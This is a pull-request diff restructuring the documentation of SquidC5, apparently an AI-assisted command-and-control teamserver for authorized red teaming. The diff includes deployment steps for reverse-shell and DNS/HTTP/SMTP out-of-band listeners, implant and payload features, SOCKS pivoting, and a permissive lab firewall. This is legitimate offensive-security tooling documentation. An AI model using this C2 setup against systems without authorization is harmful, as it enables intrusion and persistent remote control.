### PR TITLE
docs: full consistency pass (Diátaxis + product parity)

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -378,18 +378,25 @@ docker exec squidc5 cat /data/admin_token.txt
 
 | File | Purpose |
 |------|---------|
-| `AGENTS.md` | **This file** — primary agent operating memory |
+| `AGENTS.md` | **This file** — primary agent operating memory + full CLI surface |
 | `CLAUDE.md` | Pointer to AGENTS + docs |
-| `docs/squidc5-vision.md` | Full product vision / security architecture |
-| `docs/roadmap-2026-2027.md` | Prioritized next-gen roadmap (10 focus areas) |
-| `docs/user-guide.md` | Comprehensive features (what/why/how/examples) — GitHub only |
-| `docs/README.md` | Docs index |
-| `docs/operator-runbook.md` | Operator procedures |
-| `docs/deployment.md` | Binary prod deploy + lab Docker |
+| `docs/README.md` | Docs index (Diátaxis map + Ops nav → guide links) |
+| `docs/user-guide.md` | Feature reference (What/Why/How/Example/See also) — GitHub only |
+| `docs/operator-runbook.md` | Day-2 procedures (Goal/Prereqs/Steps/Verify) |
+| `docs/deployment.md` | Lab Docker + OAST + TLS + binary prod |
+| `docs/squidc5-vision.md` | Product / security architecture |
+| `docs/threat-model.md` | Assets, boundaries, STRIDE |
+| `docs/roadmap-2026-2027.md` | Long-range priorities (10 focus areas) |
+| `docs/roadmap-five-star.md` | Pack A–E / implant maturity status |
+| `docs/prod-readiness-plan.md` | Phased engineering checklist |
 | `README.md` | Public-facing quickstart |
 | `SECURITY.md` | Disclosure policy |
+| `CONTRIBUTING.md` | PR / git cycle |
+| `CHANGELOG.md` | Releases + OPSEC notes |
 | `.gitignore` | Blocks secrets, data, local config |
 | `.env.example` | Env template without secrets |
+
+**When changing product behavior:** update `docs/user-guide.md` (feature chapter) and cross-links in `docs/README.md` / runbook as needed. Keep section templates consistent (see docs/README).
 
 ## When Changing Code
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,12 +12,12 @@ Format inspired by [Keep a Changelog](https://keepachangelog.com/).
 - SOCKS5 **duplex**: direct mode + implant reverse-dial bridge (`socks:connect`)
 - Local Ollama path via `SQUIDC5_LOCAL_LLM_*` when no cloud LLM configured
 - README badges fixed (live CI + SquidGate workflow shields)
-- Docs index links to five-star roadmap + implant paths
+- Docs: Diátaxis index, Artifacts / Profiles / OAST / TLS cert library chapters, Ops nav map
 
 ### Changed
 - Ops UI and chat system prompt use **INKO** naming; user guide / runbook / README / AGENTS updated
 - INKO chat: **persisted history** (browser localStorage), clear input on send, pending indicator, block send while waiting, **markdown** rendering for assistant replies
-- Docs: INKO flyout UX, `/api/v1/ai/chat` + tools catalog, Admin LLM configure path
+- **Documentation consistency pass:** user guide What/Why/How/Example/See also; runbook Goal/Prereqs/Steps/Verify; deployment Context/Config/Commands/Verify; fixed cross-links and Ops Docs menu anchors
 
 ### Security / OPSEC
 - Native agent remains AEAD-only with full TLS verify

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -2,14 +2,18 @@
 
 **SquidC5 is a military-grade, security-first, AI-native C2 under active development** for authorized red team / pen-test use only.
 
-Follow **AGENTS.md** as the primary agent memory for this repository.
+Follow **[AGENTS.md](AGENTS.md)** as the primary agent memory for this repository.
 
 Also read:
 
-- `docs/squidc5-vision.md` — product/security architecture
-- `docs/roadmap-2026-2027.md` — 2026–2027 prioritized roadmap (start with malleable C2 profiles)
-- `docs/operator-runbook.md` — operator CLI & reverse-shell procedures
-- `docs/deployment.md` — Docker / droplet deployment
+| Doc | Why |
+|-----|-----|
+| [docs/README.md](docs/README.md) | Docs catalog + Diátaxis map |
+| [docs/squidc5-vision.md](docs/squidc5-vision.md) | Product / security architecture |
+| [docs/roadmap-2026-2027.md](docs/roadmap-2026-2027.md) | Prioritized roadmap |
+| [docs/user-guide.md](docs/user-guide.md) | Feature reference (What/Why/How/Example) |
+| [docs/operator-runbook.md](docs/operator-runbook.md) | Day-2 procedures |
+| [docs/deployment.md](docs/deployment.md) | Lab Docker + binary prod |
 
 ## Hard rules
 
@@ -17,4 +21,5 @@ Also read:
 - Admin UI only after server validates admin token (`/api/v1/ops/admin.js`)
 - No secrets in git
 - MCP allow-lists and Admin AI / INKO sandbox (capability + chat tools) are non-negotiable
+- Prod: main-CI `squidc5` binary only after PR merge
 - Do not help with unauthorized access

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -40,10 +40,19 @@ ruff check src tests
 
 ## Docs
 
-- Operator/agent memory: `AGENTS.md`
-- Vision and roadmap: `docs/`
-- Prod-readiness execution plan: `docs/prod-readiness-plan.md`
+Catalog and section templates: [docs/README.md](docs/README.md) (Diátaxis: tutorials/how-tos vs reference vs explanation).
 
+| Doc | Role |
+|-----|------|
+| [AGENTS.md](AGENTS.md) | Agent memory + full CLI surface |
+| [docs/user-guide.md](docs/user-guide.md) | Feature reference (What/Why/How/Example) |
+| [docs/operator-runbook.md](docs/operator-runbook.md) | Day-2 procedures |
+| [docs/deployment.md](docs/deployment.md) | Lab + prod binary |
+| [docs/squidc5-vision.md](docs/squidc5-vision.md) | Architecture |
+| [docs/roadmap-2026-2027.md](docs/roadmap-2026-2027.md) | Long-range roadmap |
+| [docs/prod-readiness-plan.md](docs/prod-readiness-plan.md) | Engineering checklist |
+
+When you change operator-facing behavior, update the matching user-guide chapter and fix cross-links.
 ## Pull requests
 
 Use the PR template. Include:

--- a/README.md
+++ b/README.md
@@ -41,19 +41,20 @@ Security-first, AI-native C5 teamserver for **authorized** red team and penetrat
 ## Features
 
 - **Scoped API tokens** + immutable audit hash chain (`sc5 audit-verify`)
-- **Dual AI** — MCP off by default; **INKO** neural operator chat + Admin AI (15 allow-listed capabilities); optional local Ollama
+- **Dual AI** — MCP off by default; **INKO** neural operator chat (connection + model switcher, railed tools) + Admin AI capabilities; optional local Ollama
 - **Native implant** — `agents/sc5beacon` (Go): AEAD, sleep/jitter/kill/hours, files, SOCKS reverse-dial
 - **Implant factory** — `sc5 implants build` / `POST /api/v1/implants/build`
-- **Malleable transforms** — base64, prepend/append, xor, netbios + profile push
+- **Malleable C2 profiles** — Ops **Profiles** page; transforms (base64, prepend/append, xor, netbios) + profile push
+- **Artifacts** — save/reuse payloads, custom templates, and generated assets in Ops
+- **OAST Collaborator** — DNS / HTTP / SMTP out-of-band hit capture (`sc5 oast`)
+- **TLS certificate library** — Admin PEM upload/activate (restart to serve)
 - **SOCKS5 pivot** — operator proxy with **implant reverse-dial duplex** or direct mode
 - **File ops** — `file:list|read|write|delete` (+ chunk offset/length)
 - **Engagement ROE** — banned commands, end time, HITL file-write
 - **Multi-op collab** — session claim/lock, handoff packs, spectator, presence, team chat, per-op audit
-- **Ops console** — multi-page nav, mobile drawer, **INKO** top-bar flyout chat, resizable event/console dock
+- **Ops console** — multi-page nav (Sessions, Listeners, Payloads, Profiles, Artifacts, Post-Ex, Collab, INKO, Observe, Admin), mobile drawer, **◈ INKO** flyout, resizable dock
 - **Secure defaults** — TLS on, empty CORS (no null), no public OpenAPI, admin.js gated, MCP scoped+HITL, implant AEAD on all listeners
-
 - **Binary CI** — Linux/Windows server+CLI, native agents, SBOM
-
 ## Quick start (Docker lab)
 
 ```bash
@@ -129,11 +130,16 @@ Docs: [agents/sc5beacon/README.md](agents/sc5beacon/README.md)
 | Audit verify | `GET /api/v1/audit/verify` |
 | INKO chat (ops) | `POST /api/v1/ai/chat` · `GET /api/v1/ai/tools` |
 | Admin AI capabilities | `POST /api/v1/ai/run` · `GET /api/v1/ai/status` |
-| LLM connections | `GET/POST /api/v1/llm` · `POST /api/v1/llm/models` |
+| LLM connections | `GET/POST /api/v1/llm` · `PATCH /api/v1/llm/{id}` · `POST /api/v1/llm/models` |
+| Assets / artifacts | `GET/POST/DELETE /api/v1/assets` |
+| OAST | `POST /api/v1/oast/tokens` · `GET /api/v1/oast/hits` |
+| TLS cert library | `GET/POST /api/v1/tls/certs` · activate |
 
 Auth: `Authorization: Bearer <token>`. **No public OpenAPI** on the server.
 
 ## Documentation
+
+Docs follow [Diátaxis](https://diataxis.fr/): tutorials & how-tos (runbook/deploy), reference (user guide + AGENTS), explanation (vision/threat model). Full catalog: [docs/README.md](docs/README.md).
 
 | Doc | Link |
 |-----|------|
@@ -142,13 +148,14 @@ Auth: `Authorization: Bearer <token>`. **No public OpenAPI** on the server.
 | Operator runbook | [docs/operator-runbook.md](docs/operator-runbook.md) |
 | Deployment | [docs/deployment.md](docs/deployment.md) |
 | Threat model | [docs/threat-model.md](docs/threat-model.md) |
-| Five-star roadmap | [docs/roadmap-five-star.md](docs/roadmap-five-star.md) |
-| Prod readiness | [docs/prod-readiness-plan.md](docs/prod-readiness-plan.md) |
 | Vision | [docs/squidc5-vision.md](docs/squidc5-vision.md) |
+| Roadmap 2026–2027 | [docs/roadmap-2026-2027.md](docs/roadmap-2026-2027.md) |
+| Five-star program | [docs/roadmap-five-star.md](docs/roadmap-five-star.md) |
+| Prod readiness | [docs/prod-readiness-plan.md](docs/prod-readiness-plan.md) |
 | Changelog | [CHANGELOG.md](CHANGELOG.md) |
 | Contributing | [CONTRIBUTING.md](CONTRIBUTING.md) |
 | Security | [SECURITY.md](SECURITY.md) |
-| Agents | [AGENTS.md](AGENTS.md) |
+| Agents (CLI + AI memory) | [AGENTS.md](AGENTS.md) |
 
 ## Configuration
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -1,5 +1,12 @@
 # Security Policy
 
+| Related | Link |
+|---------|------|
+| Threat model | [docs/threat-model.md](docs/threat-model.md) |
+| Secure defaults | [docs/user-guide.md#security-model](docs/user-guide.md#security-model) |
+| Disclosure contact | GitHub Security Advisories on this repository |
+| Docs index | [docs/README.md](docs/README.md) |
+
 ## Supported Versions
 
 | Version | Supported |

--- a/docs/README.md
+++ b/docs/README.md
@@ -6,27 +6,141 @@
 
 **[SquidSec](https://squidoffense.com/)** open-source C5 — [GitHub](https://github.com/SquidSec/SquidC5) · [Releases](https://github.com/SquidSec/SquidC5/releases/latest)
 
+> **Authorized use only.** Public OpenAPI is **not** served by the running server (`/docs` on the C2 stays off). These guides live in GitHub.
+
+---
+
+## How docs are organized (Diátaxis)
+
+| Need | Doc type | Where |
+|------|----------|--------|
+| Learn by doing | Tutorial / quickstart | [Root README](../README.md) · [Operator runbook](operator-runbook.md) |
+| Solve a job | How-to | [Operator runbook](operator-runbook.md) · [Deployment](deployment.md) |
+| Look up a feature | Reference | [User guide](user-guide.md) · [AGENTS.md](../AGENTS.md) (CLI surface) |
+| Understand design | Explanation | [Vision](squidc5-vision.md) · [Threat model](threat-model.md) |
+
+### Section templates (consistency)
+
+**User guide** (every feature chapter):
+
+```text
+## Feature name   ← match Ops nav label when possible
+### What
+### Why
+### How
+### Example
+### Pitfalls     ← optional table
+### See also
+```
+
+**Operator runbook** (every procedure):
+
+```text
+## Procedure name
+### Goal
+### Prerequisites
+### Steps
+### Verify
+### If it fails
+### See also
+```
+
+**Deployment** (every topic):
+
+```text
+## Topic
+### Context
+### Configuration
+### Commands
+### Verify
+### See also
+```
+
+---
+
+## Start here
+
+| Audience | Start with |
+|----------|------------|
+| New operator | [User guide — Overview](user-guide.md#overview) → [Runbook — Connect CLI](operator-runbook.md#connect-cli-to-a-server) |
+| Day-2 ops | [Operator runbook](operator-runbook.md) |
+| Deploy / upgrade | [Deployment](deployment.md) |
+| Security review | [Threat model](threat-model.md) · [SECURITY.md](../SECURITY.md) |
+| AI agents / contributors | [AGENTS.md](../AGENTS.md) · [CONTRIBUTING.md](../CONTRIBUTING.md) |
+
+---
+
+## Catalog
+
+### Operators
+
 | Document | Description |
 |----------|-------------|
-| [User guide](user-guide.md) | Features, workflows, examples (includes **INKO** neural operator) |
-| [Operator runbook](operator-runbook.md) | Day-2 shells, beacons, native implant, INKO chat |
-| [Deployment](deployment.md) | Binary prod + Docker lab + systemd |
-| [Threat model](threat-model.md) | Assets, adversaries, STRIDE |
-| [Vision](squidc5-vision.md) | Architecture |
-| [Roadmap 2026–2027](roadmap-2026-2027.md) | Long-range priorities |
-| [Five-star program](roadmap-five-star.md) | Pack A–E to category leadership |
-| [Prod readiness](prod-readiness-plan.md) | Security/ops checklist |
+| [User guide](user-guide.md) | Feature reference (What / Why / How / Example) — Ops UI, INKO, Profiles, Artifacts, OAST, CLI |
+| [Operator runbook](operator-runbook.md) | Day-2 procedures: shells, beacons, OAST, implants, collab |
+| [Deployment](deployment.md) | Docker lab, OAST, TLS, binary prod + systemd |
+
+### Security & architecture
+
+| Document | Description |
+|----------|-------------|
+| [Threat model](threat-model.md) | Assets, trust boundaries, STRIDE, controls |
+| [Vision](squidc5-vision.md) | Product / security architecture |
+| [SECURITY.md](../SECURITY.md) | Vulnerability disclosure |
+
+### Planning (engineering)
+
+| Document | Description |
+|----------|-------------|
+| [Roadmap 2026–2027](roadmap-2026-2027.md) | Long-range priorities (10 focus areas) |
+| [Five-star program](roadmap-five-star.md) | Pack A–E status toward category leadership |
+| [Prod readiness](prod-readiness-plan.md) | Phased security/ops execution checklist |
+
+### Project
+
+| Document | Description |
+|----------|-------------|
 | [Changelog](../CHANGELOG.md) | Releases + OPSEC notes |
 | [Contributing](../CONTRIBUTING.md) | PR / git cycle |
-| [Security](../SECURITY.md) | Disclosure |
-| [AGENTS](../AGENTS.md) | CLI + agent memory |
+| [AGENTS.md](../AGENTS.md) | Full CLI surface + agent operating memory |
+| [Root README](../README.md) | Public quickstart |
 
 ### Implant & modules
 
 | Path | Description |
 |------|-------------|
-| [agents/sc5beacon](../agents/sc5beacon/README.md) | Native Go beacon (Linux/Windows/macOS) |
+| [agents/sc5beacon](../agents/sc5beacon/README.md) | Native Go beacon (Linux / Windows / macOS) |
 | [agents/windows](../agents/windows/README.md) | Windows notes |
+| [agents/linux](../agents/linux/README.md) | Linux notes |
 | [modules/bof](../modules/bof/README.md) | BOF-style lab modules |
 
-Public OpenAPI is **not** served by the running server (`/docs` stays off).
+---
+
+## Ops console map
+
+Nav labels in `/ops` (match [User guide](user-guide.md#ops-console-layout)):
+
+| Nav | Guide section |
+|-----|---------------|
+| Dashboard | [Status overview](user-guide.md#status-overview) |
+| Sessions | [Sessions](user-guide.md#sessions) |
+| Listeners | [Listeners](user-guide.md#listeners) |
+| Payloads | [Payloads and implants](user-guide.md#payloads-and-implants) |
+| Profiles | [C2 profiles](user-guide.md#c2-profiles-profiles) |
+| Artifacts | [Artifacts](user-guide.md#artifacts) |
+| Post-Ex | [Post-Ex](user-guide.md#post-ex) |
+| Collab | [Multi-operator collab](user-guide.md#multi-operator-collab) |
+| INKO | [INKO](user-guide.md#inko-intelligent-neural-kinetic-operator) |
+| Observe | [Observability](user-guide.md#observability) |
+| Admin | [Tokens](user-guide.md#tokens) · [LLM connections](user-guide.md#llm-connections) · [Feature toggles](user-guide.md#feature-toggles) · [TLS certificates](user-guide.md#tls-certificate-library) |
+
+Top bar **◈ INKO** opens the chat flyout (same INKO stack as the nav page).
+
+---
+
+## Link conventions
+
+- Prefer relative paths: `user-guide.md#sessions`, `../AGENTS.md`
+- Heading anchors: lowercase, hyphens for spaces; avoid em dashes in headings when deep-linking
+- CLI full surface: **[AGENTS.md](../AGENTS.md)** is source of truth; user guide CLI section is a summary
+- Never document live tokens, keys, or commit `data/`

--- a/docs/deployment.md
+++ b/docs/deployment.md
@@ -1,23 +1,43 @@
 # SquidC5 Deployment
 
-## Docker (primary)
+Lab (Docker) and production (CI binary) deployment. For day-2 operator procedures see [operator-runbook.md](operator-runbook.md). For features see [user-guide.md](user-guide.md).
+
+| Related | Link |
+|---------|------|
+| Docs index | [README.md](README.md) |
+| Prod readiness | [prod-readiness-plan.md](prod-readiness-plan.md) |
+| Threat model | [threat-model.md](threat-model.md) |
+| Env template | [../.env.example](../.env.example) |
+
+---
+
+## Docker lab
+
+### Context
+
+Primary **lab** path. Compose defaults to `network_mode: host` so reverse-shell/TCP listeners bind real host ports without republishing each port.
+
+### Configuration
+
+- Image/build via `docker-compose.yml`
+- Data volume → `/data` (tokens, DB, TLS) — never commit
+- TLS on by default (self-signed)
+
+### Commands
 
 ```bash
 docker compose up --build -d
 docker exec squidc5 cat /data/admin_token.txt   # once; store securely
-# TLS on by default (self-signed) — use -k for lab probes
 curl -sk https://127.0.0.1:8443/api/v1/health
 ```
 
-### Host networking (default in compose)
+#### Host networking (default)
 
-`network_mode: host` so TCP/reverse-shell listeners bind real host ports without listing each port in `ports:`.
+`network_mode: host` — process binds host ports directly. Trade-off: less isolation; fine for single-purpose C2 lab hosts.
 
-Trade-off: less isolation; fine for single-purpose C2 droplets.
+#### Bridge networking alternative
 
-### Bridge networking alternative
-
-If using bridge, publish every listener port:
+If using bridge, publish every listener port you need:
 
 ```yaml
 ports:
@@ -26,18 +46,61 @@ ports:
   - "4444:4444"
 ```
 
+### Verify
+
+```bash
+curl -skf https://127.0.0.1:8443/api/v1/health
+# Ops UI: https://127.0.0.1:8443/ops
+```
+
+### See also
+
+- [Root README — Quick start (Docker)](../README.md#quick-start-docker-lab)
+- [Privileged ports](#privileged-ports)
+
+---
+
 ## Privileged ports
 
-App user is non-root. For listeners on ports &lt; 1024:
+### Context
+
+App user is non-root. Binding listeners on ports &lt; 1024 requires host capability.
+
+### Configuration
 
 ```bash
 sysctl -w net.ipv4.ip_unprivileged_port_start=0
 echo "net.ipv4.ip_unprivileged_port_start=0" | sudo tee /etc/sysctl.d/99-squidc5.conf
 ```
 
+### Commands
+
+Apply sysctl, then start/restart SquidC5 and create low-port listeners.
+
+### Verify
+
+```bash
+sc5 listeners create rev443 443 --kind reverse_shell
+sc5 listeners start <id>
+sc5 listeners list   # status running
+```
+
+### See also
+
+- [User guide — Listeners](user-guide.md#listeners)
+- [Firewall](#firewall)
+
+---
+
 ## Firewall
 
-Dedicated C2 lab droplet pattern: **allow all inbound** so any reverse-shell listener port works without re-opening UFW each time. Only SquidC5 + SSH should listen publicly.
+### Context
+
+Dedicated C2 lab host pattern: allow inbound so reverse-shell listener ports work without re-opening UFW each time. Only SSH + SquidC5 should listen publicly on a hardened prod host (tighten as required by your ROE).
+
+### Configuration
+
+Lab-permissive example:
 
 ```bash
 ufw --force reset
@@ -47,61 +110,96 @@ ufw allow OpenSSH
 ufw --force enable
 ```
 
-Verify public listeners are only `sshd` + SquidC5 (`python`):
+### Commands
 
 ```bash
 ss -tulnp | grep -v 127.0.0
 ```
 
-Disable unused services that might bind ports (ModemManager, etc.) on the host. DNS (`systemd-resolved`) may listen on `127.0.0.53` only — that is fine.
+Disable unused host services that might bind ports. DNS (`systemd-resolved`) on `127.0.0.53` only is fine.
 
-## DigitalOcean lab pattern
+### Verify
 
-- Size: `s-1vcpu-1gb` (practical minimum)
-- Image: Ubuntu LTS
-- Install path: `/opt/squidc5`
-- SSH deploy key: use operator machine key already registered with DO (do not commit private keys)
+Public listeners are only expected services (sshd + squidc5).
 
-Environment variables: see `.env.example` (`SQUIDC5_*`).
+### See also
+
+- [OAST Collaborator](#oast-collaborator-dns-http-smtp) (ports 53/25/80/…)
+
+---
+
+## Cloud lab pattern
+
+### Context
+
+Typical single-droplet lab (any cloud). Paths below match common SquidC5 installs.
+
+### Configuration
+
+| Item | Suggested |
+|------|-----------|
+| Size | 1 vCPU / 1 GB RAM minimum |
+| Image | Ubuntu LTS |
+| Install path | `/opt/squidc5` |
+| SSH | Operator key registered with provider — never commit private keys |
+| Env | `SQUIDC5_*` from [.env.example](../.env.example) |
+
+### Commands
+
+Follow [Production binary deploy](#production-binary-only-deploy) or Docker lab on the droplet.
+
+### Verify
+
+```bash
+curl -skf https://127.0.0.1:8443/api/v1/health
+```
+
+### See also
+
+- [Production binary-only deploy](#production-binary-only-deploy)
+
+---
 
 ## OAST Collaborator (DNS + HTTP + SMTP)
 
-Authorized out-of-band interaction capture (Burp Collaborator / Interactsh style).
+### Context
 
-### Env
+Authorized out-of-band interaction capture (Collaborator / Interactsh style). Values below are **illustrative** — use your own zone, host, and IP.
 
-| Var | Example | Purpose |
-|-----|---------|---------|
-| `SQUIDC5_OAST_ZONE` | `oast.squidoffense.com` | Authoritative OAST zone |
-| `SQUIDC5_PUBLIC_HOST` | `oast.squidoffense.com` | Hostnames in payload URLs |
-| `SQUIDC5_PUBLIC_IP` | `159.203.99.184` | A-record answers for DNS OAST |
+### Configuration
+
+| Var | Example (replace) | Purpose |
+|-----|-------------------|---------|
+| `SQUIDC5_OAST_ZONE` | `oast.example.com` | Authoritative OAST zone |
+| `SQUIDC5_PUBLIC_HOST` | `oast.example.com` | Hostnames in payload URLs |
+| `SQUIDC5_PUBLIC_IP` | `203.0.113.10` | A-record answers for DNS OAST |
 | `SQUIDC5_OAST_ENABLED` | `true` | Gate feature |
 | `SQUIDC5_OAST_HTTP_PORT` | `80` | Port shown in HTTP payload URLs |
 
-### DNS delegation (subdomain only — do not change apex NS)
+#### DNS delegation (subdomain only — do not change apex NS)
 
-Example for `oast.squidoffense.com` → teamserver `159.203.99.184`:
+Example for `oast.example.com` → teamserver `203.0.113.10`:
 
 | Type | Name | Data |
 |------|------|------|
-| A | ns1.oast | 159.203.99.184 (glue) |
-| A | oast | 159.203.99.184 |
-| NS | oast | ns1.oast.squidoffense.com |
-| MX | oast | oast.squidoffense.com (priority 0) |
+| A | ns1.oast | 203.0.113.10 (glue) |
+| A | oast | 203.0.113.10 |
+| NS | oast | ns1.oast.example.com |
+| MX | oast | oast.example.com (priority 0) |
 
 Leave apex `@` A (website) and apex NS (registrar) alone.
 
-### Firewall ports (teamserver)
+#### Firewall ports (teamserver)
 
-Open at minimum: **53/udp, 53/tcp, 25/tcp, 80/tcp, 443/tcp, 8443/tcp**.
+Open at minimum for full OAST: **53/udp, 53/tcp, 25/tcp, 80/tcp, 443/tcp, 8443/tcp**.
 
 Port 53 needs root or `ip_unprivileged_port_start=0`. Port 25 is often blocked by cloud providers — use 2525 for lab SMTP OAST if needed.
 
-### Listeners
+### Commands
 
 ```bash
 # DNS OAST + beacon (mode both|oast|beacon)
-sc5 --insecure listeners create oast-dns 53 --kind dns --zone oast.squidoffense.com --dns-mode both
+sc5 --insecure listeners create oast-dns 53 --kind dns --zone oast.example.com --dns-mode both
 sc5 --insecure listeners start <id>
 
 # HTTP OAST catch-all
@@ -113,23 +211,32 @@ sc5 --insecure listeners start <id>
 sc5 --insecure listeners create oast-smtp 25 --kind smtp
 ```
 
-### Operator verify
+### Verify
 
 ```bash
-sc5 --insecure login --url https://159.203.99.184:8443 --token sc5_...
+sc5 --insecure login --url https://TEAM:8443 --token sc5_...
 sc5 --insecure oast token create --note "xss"
 # TOKEN=... from response
-dig @8.8.8.8 $TOKEN.oast.squidoffense.com A
-curl -sS "http://oast.squidoffense.com/$TOKEN/"
-# swaks --to $TOKEN@oast.squidoffense.com --server 159.203.99.184
-sc5 --insecure oast hits --token $TOKEN
+dig @8.8.8.8 "$TOKEN.oast.example.com" A
+curl -sS "http://oast.example.com/$TOKEN/"
+# optional: swaks --to "$TOKEN@oast.example.com" --server TEAM_IP
+sc5 --insecure oast hits --token "$TOKEN"
 ```
 
 CLI: global `--insecure` / config `verify_ssl: false` for self-signed API TLS.
 
-## TLS (HTTPS) — default on new instances
+### See also
 
-On first start, SquidC5 generates a **unique self-signed certificate** under:
+- [User guide — OAST](user-guide.md#oast-collaborator)
+- [Operator runbook — OAST](operator-runbook.md#oast-collaborator-http-dns-smtp)
+
+---
+
+## TLS (HTTPS) default on new instances
+
+### Context
+
+On first start, SquidC5 generates a **unique self-signed certificate** under the data dir and serves ops UI, REST API, and MCP over **HTTPS**.
 
 ```text
 $SQUIDC5_DATA_DIR/tls/server.crt
@@ -137,7 +244,7 @@ $SQUIDC5_DATA_DIR/tls/server.key
 $SQUIDC5_DATA_DIR/tls/instance_id
 ```
 
-All traffic on the process port (ops UI, REST API, MCP) is served over **HTTPS** via uvicorn.
+### Configuration
 
 | Env | Default | Meaning |
 |-----|---------|---------|
@@ -146,45 +253,61 @@ All traffic on the process port (ops UI, REST API, MCP) is served over **HTTPS**
 | `SQUIDC5_TLS_FORCE_NEW` | `false` | Regenerate cert/key on next start |
 | `SQUIDC5_PUBLIC_HOST` | empty | Added to cert SAN when set |
 
-Browsers will warn on self-signed certs — expected. For production, put a real cert on a redirector (see Redirector / cert plan in ops) or override cert/key paths with CA-issued material.
+Browsers warn on self-signed certs — expected. For production, put a real cert on a redirector or override cert/key paths with CA-issued material. Ops **Admin → TLS certificate library** can upload/activate PEMs; **restart the process** after activate.
+
+Disable only for lab debugging: `SQUIDC5_TLS_ENABLED=false` (plaintext — not recommended).
+
+### Commands
 
 ```bash
-# After start
 curl -k https://127.0.0.1:8443/api/v1/health
 # Ops: https://HOST:8443/ops  (accept warning)
 ```
 
-Disable only for lab debugging: `SQUIDC5_TLS_ENABLED=false` (plaintext — not recommended).
+### Verify
 
-## Production: binary-only deploy (required)
+```bash
+curl -skf https://127.0.0.1:8443/api/v1/health
+openssl s_client -connect 127.0.0.1:8443 -servername HOST </dev/null 2>/dev/null | openssl x509 -noout -subject -dates
+```
+
+### See also
+
+- [User guide — TLS certificate library](user-guide.md#tls-certificate-library)
+- [User guide — Security model](user-guide.md#security-model)
+- [Production binary-only deploy](#production-binary-only-deploy)
+
+---
+
+## Production binary-only deploy
+
+### Context
 
 Prod is **not** updated from a local working tree or Docker rebuild of WIP.
 
 Pipeline:
 
-1. Open PR → CI tests must pass  
-2. Merge to `main` / `master`  
-3. Main CI builds standalone binaries (`sc5`, `squidc5`)  
-4. Download **Linux `squidc5`** from that Actions run’s artifacts  
-5. Deploy **only that executable** to the droplet; keep `data/` intact  
+1. Open PR → CI tests must pass
+2. Merge to `main` / `master`
+3. Main CI builds standalone binaries (`sc5`, `squidc5`) and publishes a GitHub Release
+4. Download **Linux `squidc5-linux-x64`** from that Release
+5. Deploy **only that executable**; keep `data/` intact
+
+**Forbidden on prod:** rsync of WIP source, `docker compose up --build` from dirty checkout, feature-branch-only binaries.
+
+**Allowed:** install/restart main-built binary; preserve data dir; `SQUIDC5_*` env.
+
+### Configuration
+
+- Install dir e.g. `/opt/squidc5/bin/squidc5`
+- Data dir e.g. `/opt/squidc5/data`
+- Unit: [`packaging/squidc5.service`](../packaging/squidc5.service)
+
+### Commands
+
+#### First install
 
 ```bash
-scp -i <key> squidc5 root@<droplet>:/opt/squidc5/bin/squidc5.new
-ssh -i <key> root@<droplet> '
-  systemctl stop squidc5 || true
-  install -m 755 /opt/squidc5/bin/squidc5.new /opt/squidc5/bin/squidc5
-  systemctl start squidc5
-'
-```
-
-Do **not** rsync source or `docker compose up --build` for production once this path is active. Docker remains for local/lab only.
-
-### systemd unit
-
-Unit template: [`packaging/squidc5.service`](../packaging/squidc5.service).
-
-```bash
-# First install
 install -d /opt/squidc5/bin /opt/squidc5/data
 install -m 755 squidc5-linux-x64 /opt/squidc5/bin/squidc5
 cp packaging/squidc5.service /etc/systemd/system/squidc5.service
@@ -193,13 +316,12 @@ systemctl daemon-reload
 systemctl enable --now squidc5
 ```
 
-### Binary upgrade (preserve data)
+#### Binary upgrade (preserve data)
 
 ```bash
 # 1. Download latest Linux squidc5 from GitHub Release (main CI)
 # 2. Backup DB
 sc5 backup /opt/squidc5/backups/pre-upgrade.db --data-dir /opt/squidc5/data
-# or: sqlite3 /opt/squidc5/data/squidc5.db ".backup /opt/squidc5/backups/pre.db"
 
 scp -i <key> squidc5-linux-x64 root@HOST:/opt/squidc5/bin/squidc5.new
 ssh -i <key> root@HOST '
@@ -208,14 +330,13 @@ ssh -i <key> root@HOST '
   install -m 755 /opt/squidc5/bin/squidc5.new /opt/squidc5/bin/squidc5
   rm -f /opt/squidc5/bin/squidc5.new
   systemctl start squidc5
-  # Schema migrations apply automatically on start
   curl -skf https://127.0.0.1:8443/api/v1/health
 '
 ```
 
 Listeners marked `running` are restored after restart. Prefer stopping via systemd (not operator `listeners stop`) when you want auto-restore.
 
-### Recommended prod env drop-ins
+#### Recommended prod env drop-ins
 
 ```ini
 # /etc/systemd/system/squidc5.service.d/rate.conf
@@ -232,14 +353,56 @@ Environment=SQUIDC5_TLS_CERT_FILE=/etc/letsencrypt/live/HOST/fullchain.pem
 Environment=SQUIDC5_TLS_KEY_FILE=/etc/letsencrypt/live/HOST/privkey.pem
 ```
 
+### Verify
+
+```bash
+systemctl is-active squidc5
+curl -skf https://127.0.0.1:8443/api/v1/health
+```
+
+### See also
+
+- [AGENTS.md — Production deploy policy](../AGENTS.md)
+- [Prod readiness](prod-readiness-plan.md)
+- [Secrets hygiene](#secrets-hygiene)
+
+---
+
 ## Secrets hygiene
+
+### Context
+
+Tokens, DB files, and API keys must never enter git or public artifacts.
+
+### Configuration
 
 Never commit:
 
 - `data/admin_token.txt`
 - `data/*.db`
+- `data/tls/*.key`
 - `~/.config/squidc5/config.json`
 - `.env` with real tokens
 - LLM API keys
 
+### Commands
+
 Rotate bootstrap admin token after first login by creating a new admin-scoped token and revoking the bootstrap id if desired.
+
+```bash
+sc5 tokens create admin2 --scopes "admin"
+sc5 tokens revoke <bootstrap_id>
+```
+
+### Verify
+
+```bash
+git status   # no data/ or .env secrets
+git check-ignore -v data/admin_token.txt
+```
+
+### See also
+
+- [SECURITY.md](../SECURITY.md)
+- [Threat model](threat-model.md)
+- [.gitignore](../.gitignore)

--- a/docs/operator-runbook.md
+++ b/docs/operator-runbook.md
@@ -1,10 +1,32 @@
 # SquidC5 Operator Runbook
 
-**Command • Control • Cognitive • Collaborative • Coordination**
+**Command · Control · Cognitive · Collaborative · Coordination**
 
 Authorized red team / pen-test use only.
 
+How-to procedures for day-2 work. For feature reference (What / Why / How / Example), see the [User guide](user-guide.md). For install and prod binary deploy, see [Deployment](deployment.md).
+
+| Related | Link |
+|---------|------|
+| User guide | [user-guide.md](user-guide.md) |
